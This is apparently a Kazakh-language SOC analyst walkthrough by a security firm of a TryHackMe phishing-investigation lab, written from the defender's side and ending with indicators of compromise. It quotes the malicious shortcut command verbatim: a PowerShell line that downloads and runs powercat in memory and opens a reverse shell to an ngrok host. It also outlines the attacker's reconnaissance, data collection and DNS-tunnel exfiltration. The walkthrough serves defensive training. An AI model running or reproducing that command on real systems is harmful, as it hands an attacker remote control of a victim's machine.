TryHackMe SOC Simulator-дағы Phishing Unfolding тапсырмасын талдау (Phishing Unfolding SOC Simulator TryHackMe walkthrough)

КІРІСПЕ

TryHackMe - киберқауіпсіздік дағдыларын жаттығу үшін көрнекі платформа.

RTEAM-да біз тәжірибе кезінде джуниорлар мен студенттерді тез қабылдау үшін осы платформаны пайдаланамыз. Жақында платформада аналитик дағдыларын жаттығуға арналған жаңа бөлім пайда болды - SOC Simulator.

Біздің SOC тобы бірінші тапсырманы орындады және орындалуын бөлісуге дайын. Бастауыш аналитиктерге және ақпараттық қауіпсіздікті тәжірибеде қызықтыратындарға пайдалы болады деп ойлаймыз.

ТАПСЫРМА СИПАТТАМАСЫ

Бірінші тапсырманың сипаттамасына көшейік.

TryHatMe - электрондық коммерция саласындағы ең жылдам өсіп келе жатқан компаниялардың бірі, онлайн бас киімдерді сатуға маманданған. Тұтынушыларға сатып алмас бұрын виртуалды түрде бас киімдерді "сынауға" мүмкіндік беретін бірегей құндылық ұсынысы оларды нарықта ерекшелендірді және жылдам өсуге ықпал етті.

Активтер тізімі:

Michael Ascot, CEO [email protected] Logged-in host: win-3450
Sophie J, HR [email protected] Logged-in host: win-3461
Michelle Smith, Legal [email protected] Logged-in host: win-3459
Roger Fedora, Marketing [email protected] Logged-in host: win-3460
Yani Zubair, IT [email protected] Logged-in host: win-3449
Miguel O'Donnell, Sales [email protected] Logged-in host: win-3451
Cain Omoore, Sales [email protected] Logged-in host: win-3452
Kyra Flores, Sales [email protected] Logged-in host: win-3453
Amna Espinoza, Sales [email protected] Logged-in host: win-3454
Ashwin Johnston, Sales [email protected] Logged-in host: win-3455
Safa Prince, Sales [email protected] Logged-in host: win-3456
Diego Summers, Sales [email protected] Logged-in host: win-3457
Armaan Terry, Sales [email protected] Logged-in host: win-3458

"Phishing Unfolding" сценарийінде біз SOC Аналитигі ретінде нақты уақытта фишинг шабуылымен бетпе-бет келеміз. Біздің міндетіміз - келе жатқан ескертулерді талдау, шабуылдың негізгі кезеңдерін анықтау және ақпаратты есептерге жинау арқылы жауап беру. Табыс нақты қауіптерді (true positive) жалған оқиғалардан (false positive) ажырата білу қабілетіне және уақытты тиімді басқаруға байланысты.

ТАЛДАУ ҚҰРАЛДАРЫ

Тапсырманы орындау үшін бізде бірнеше негізгі құралдары бар IRP порталы бар:

Alert Queue - күмәнді әрекеттер туралы барлық хабарламалар жиналатын негізгі жұмыс құралымыз. Интерфейс әр ескертуді талдауға тез өтуге, басымдықтарды қоюға және оларды өңдеуге алуға мүмкіндік береді.

SIEM (Splunk) - логтар мен оқиғаларды талдау орталығы. Мұнда біз қауіпті растауларды таба аламыз, компрометация индикаторларын зерттей аламыз және оқиғалар арасындағы байланыстарды анықтай аламыз.

Analyst VM - Терең талдау үшін барлық артефактілер жиналған оқшауланған жұмыс кеңістігі: күмәнді файлдар, PowerShell скриптілері, DNS сұрау журналдары және т.б. Мұнда біз күмәнді белсенділікті егжей-тегжейлі зерттей аламыз.

Dashboard - Жұмысымызды бақылау үшін ыңғайлы құрал. Ол өңделген ескертулер бойынша статистиканы көрсетеді, оларды true positive және false positive болып бөледі, сондай-ақ тиімділігіміздің жалпы суретін береді.

Сценарий ескертулерді зерттеуден басталады, мұнда біз хабарламаны өңдеуге аламыз. Бұл әрекет MTTR (орташа шешім уақыты) таймерын іске қосады, сондықтан тез әрекет ету керек. Біз қосымша ақпарат іздеу үшін SIEM-ді және күмәнді деректерді егжей-тегжейлі талдау үшін Analyst VM-ді пайдаланамыз. Барлық деректерді біріктіріп, қауіпті растау немесе жоққа шығару керек, содан кейін қорытындыларымызды нақты құжаттау керек.

Негізгі мақсат — барлық true positive ескертулерді жабу ғана емес, сонымен қатар егжей-тегжейлі есеп дайындау. Сценарий аяқталғаннан кейін біз жұмысымыз бойынша кері байланыс аламыз, соның ішінде MTTR (Mean Time to Respond) егжей-тегжейлі талдауы, өңделген ескертулер саны және кәсіби дағдыларды жақсарту бойынша ұсыныстар.

ОҚИҒАЛАРДЫ ТАЛДАУ

IT маманы Yani Zubair скрипті

TICKET 1003

Status: False Positive

8:06:13 AM: IT қызметкері Yani Zubair ([email protected]) "Force Update Fix" тақырыбымен хат жіберді. Қосылған forceupdate.ps1 файлы заң бөлімінен Michelle Smith оның win-3459 хостына жүктеді.

<#
.SYNOPSIS
This script was crafted by the one and only Yani Zubair from IT. Contact him at [email protected] for all your tech needs!

.DESCRIPTION
This script automates Windows updates and performs various system diagnostics for troubleshooting. The generated files are saved in the output folder and can be sent via email if needed.

.NOTES
Author: Yani Zubair
Contact: [email protected]
#>

Write-Host "Greetings, tech warriors! This script, artfully crafted by Yani Zubair from IT, is here to save the day! Contact him at [email protected] for all your tech needs." -ForegroundColor Magenta

Write-Host "Starting Windows Update and System Diagnostics..." -ForegroundColor Green

# Install and import the PSWindowsUpdate module
Install-Module PSWindowsUpdate -Force -Scope CurrentUser
Import-Module PSWindowsUpdate

# Force Windows Update
Write-Host "Installing all available updates, this might take some time..." -ForegroundColor Green
Install-WindowsUpdate -AcceptAll -AutoReboot
Write-Host "Windows Update completed." -ForegroundColor Green

# System Diagnostics
$diagnosticsPath = "C:\Temp"
if (-Not (Test-Path $diagnosticsPath)) {
New-Item -Path $diagnosticsPath -ItemType Directory -Force
}

# Collecting System Information
Write-Host "Collecting System Information..." -ForegroundColor Green
Get-ComputerInfo > "$diagnosticsPath\SystemInfo.txt"
Write-Host "System Information collected."

# Collecting Network Configuration
Write-Host "Collecting Network Configuration..." -ForegroundColor Green
ipconfig /all > "$diagnosticsPath\NetworkConfig.txt"
Write-Host "Network Configuration collected."

# Collecting Installed Programs
Write-Host "Collecting Installed Programs..." -ForegroundColor Green
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate > "$diagnosticsPath\InstalledPrograms.txt"
Write-Host "Installed Programs collected."

# Collecting Running Processes
Write-Host "Collecting Running Processes..." -ForegroundColor Green
Get-Process | Sort-Object CPU -Descending | Select-Object -First 10 > "$diagnosticsPath\RunningProcesses.txt"
Write-Host "Running Processes collected."

Write-Host "All tasks completed. Diagnostics files are saved in $diagnosticsPath." -ForegroundColor Green

# Email generated files to Yani
Send-MailMessage -To "[email protected]" -From "[email protected]" -Subject "Windows Update and Diagnostics Report" -Body "Here are the files generated by the script." -Attachments "$diagnosticsPath\SystemInfo.txt", "$diagnosticsPath\NetworkConfig.txt", "$diagnosticsPath\InstalledPrograms.txt", "$diagnosticsPath\RunningProcesses.txt"

Бұл скрипт IT маманына есептер жіберу мүмкіндігі бар Windows жаңартулары үшін заңды автоматтандырылған шешім болып шықты. Бұл жағдай инцидентке әкелмесе де, сенімді көздерден де барлық сценарийлерді тексерудің маңыздылығын көрсетеді.

Фишинг хаты

TICKET 1015

MITRE ATT&CK Phishing: Spear Phishing Attachment (T1566.001)

Status: True Positive

8:22:49 AM: Компания CEO-сы Michael Ascot ([email protected]) [email protected] жіберушіден хат алды.

Хатта қосымша болды - ImportantInvoice-February.zip архиві (1 КБ). Архив PDF файлына бейнеленген invioce.pdf.lnk таңбашасын қамтиды. Алайда таңбаша ішінде келесі зиянды команда болды:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 2.tcp.ngrok.io -p 19282 -e powershell

Скрипт PowerShell скрипті powercat.ps1 жадта жүктеу және іске қосу үшін one-liner болып табылады, сондай-ақ ngrok қызметін пайдаланып реверс шелл жасау.

Таңбашаны ашқаннан кейін PowerShell процесі автоматты түрде іске қосылды, бұл Powercat жүктелуіне және орындалуына әкелді, шабуылшыға жүйеге қатынас берді. Реверс шелл алынғаннан кейін шабуылшы шабуылдың келесі кезеңін бастады.

Барлау және деректерді эксфильтрациялау

Бэк-коннект алынғаннан кейін шабуылшы Michael Ascot хостынан барлау және деректер жинау үшін қашықтан қатынасты пайдаланды. Негізгі кезеңдер келесідей дамыды:

MITRE ATT&CK Account Discovery: Domain Account (T1087.002)

8:31:15 AM: __PSScriptPolicyTest_hnpvwg1v.3mr.ps1 файлы жасалды, әдетте нақты PowerShell скриптілерін іске қосу рұқсаттарын тексеру үшін. Бұл әрекет жүйеде PowerShell-ді одан әрі пайдалану мүмкіндіктерін анықтау әрекетін көрсетеді.

8:32:23 AM: Active Directory инфрақұрылымын талдауға арналған PowerView.ps1 скрипті бақыланатын хостқа жүктелді және орындалды. SIEM журналдарында домен, пайдаланушы және топ деректерін жинауды қамтитын барлау кезеңі белсенділігі тіркелді.

TICKET 1033

MITRE ATT&CK Collection: Data from Network Shared Drive (T1039)

8:34:11 AM: Шабуылшы жергілікті машинада C:\Users\michael.ascot\Downloads\exfiltration қалтасын жасады. net.exe утилитасын пайдаланып, желілік шары \\FILESRV-01\SSF-FinancialRecords жергілікті виртуалды диск Z: ретінде монталды.

Содан кейін Robocopy.exe көмегімен шарыдан файлдар құрбанның компьютеріне бұрын жасалған exfiltration қалтасына жергілікті түрде көшірілді.

TICKET 1039-1046, 1048-1049

MITRE ATT&CK Exfiltration Over Alternative Protocol: DNS (T1048.003)

8:35:16 AM: Белсенділік іздерін жасыру үшін файлдық шарына желілік қосылым командамен үзілді

net.exe use Z: /delete

8:35:34 AM: Жиналған деректер exfilt8me.zip архивіне қойылды. Деректерді беру үшін шабуылшы алдымен архиві base64 форматында кодтады. Содан кейін PowerShell-ден іске қосылған nslookup.exe көмегімен DNS сұраулар сериясын орындай отырып DNS-туннельдеу әдісі қолданылды. Кодталған деректер DNS сұраулардың бөліктері ретінде берілген 30 таңба блоктарына бөлінді.

НЕ БОЛДЫ?

Бұл инцидент жақсы ұйымдастырылған көп кезеңді шабуылдың мысалы, оның ішінде:

• Жүйеге қатынас алу үшін әлеуметтік инженерияны пайдалану.
• PowerShell көмегімен компания инфрақұрылымы туралы ақпарат жинау.
• Желілік шарынан құпия ақпаратты көшіру.
• Жасырын арналар арқылы деректерді беру (DNS-туннельдеу).

Мақсатты фишинг шабуылдары корпоративтік жүйелерді компрометациялаудың ең тиімді құралдарының бірі болып қала беруде, әсіресе PowerShell сияқты заңды құралдар мен операциялық жүйелердің кіріктірілген мүмкіндіктерін пайдаланумен бірге. Шабуылшылар барлау, желі бойынша қозғалу және деректерді эксфильтрациялау үшін осы құралдарды пайдалануда жоғары тиімділік көрсетеді, анықталу ықтималдығын азайтады. Мұндай әдістердің таралуы қауіпсіздік саясатын нығайтуды, белсенділікті бақылауды және қызметкерлердің санасын үнемі арттыруды қамтитын киберқауіпсіздікке кешенді тәсілдің маңыздылығын атап өтеді.

Компрометация индикаторлары:

• 2[.]tcp[.]ngrok[.]io:19282
• hatmakereurope[.]xyz
• raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat.ps1
• ImportantInvoice-February[.]zip
• invoice[.]pdf[.]lnk
• exfilt8me[.]zip
• 145BB70ABD0CC625F4A7ADD8CFB08982C39C4573470C8B87DB41D755BD2F9EA0
• 50E5BF8361DF2442546F21E08B1561273F4CCC610258F622AC1A4B8EBF0A0386

Бұл жағдай тиімді қорғаныс тек бақылауды емес, сонымен қатар шабуылшылар әрекеттерінің терең түсінігін талап ететінін тағы бір рет дәлелдейді.

RTEAM-да біз Red Team және Blue Team тәжірибесін біріктіріп, осалдықтарды анықтау және бизнесті қорғау үшін кешенді және сенімді шешімдер ұсынамыз.

💼 Біздің қызметтер: https://rteam.kz

📞 Байланыс: +7 775 999 91 09

✉️ E-mail: [email protected]